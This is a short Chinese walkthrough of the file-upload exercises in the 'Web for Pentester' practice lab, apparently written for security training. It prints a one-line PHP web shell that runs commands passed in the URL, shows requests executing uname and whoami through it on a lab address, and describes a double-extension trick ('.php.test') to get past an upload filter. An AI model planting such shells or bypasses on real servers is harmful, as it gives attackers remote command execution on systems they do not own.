Web for Pentester 文件上传

参考解答

Example 1

测试发现可以上传任意格式文件，程序没有格式验证，直接上传小马。

<?php
system($_GET["cmd"]);
?>

几个利用

http://192.168.56.101/upload/images/xiaoma.php?cmd=uname%20-a
http://192.168.56.101/upload/images/xiaoma.php?cmd=whoami

Example 2

上传php格式的文件会报错，程序有格式限制，不允许直接上传php格式文件
修改文件扩展名yjh.php.xxx，利用解析漏洞，修改的后缀名需要是Linux系统无法识别的。

http://192.168.56.101/upload/images/xiaoma.php.test?cmd=uname%20-a
http://192.168.56.101/upload/images/xiaoma.php.test?cmd=whoami

参考资料

米斯特白帽培训讲义 漏洞篇 文件上传
https://wizardforcel.gitbooks.io/mst-sec-lecture-notes/content/%E6%BC%8F%E6%B4%9E%E7%AF%87%20%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.html

Web for pentester I part 2
http://www.atomsec.org/%E5%AE%89%E5%85%A8/web_for_pentester_i-part-2/